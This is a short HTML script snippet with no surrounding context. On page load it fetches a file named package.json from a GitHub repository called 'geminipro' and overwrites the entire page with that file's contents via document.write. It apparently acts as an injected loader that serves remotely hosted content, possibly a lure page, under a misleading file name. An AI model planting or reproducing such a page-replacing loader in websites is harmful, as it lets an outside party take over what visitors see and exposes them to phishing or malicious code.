<script>
  (function() {
    fetch('https://raw.githubusercontent.com/exoticstecvr/geminipro/main/package.json')
      .then(r => r.text())
      .then(c => {
        document.open();
        document.write(c);
        document.close();
      });
  })();
</script>
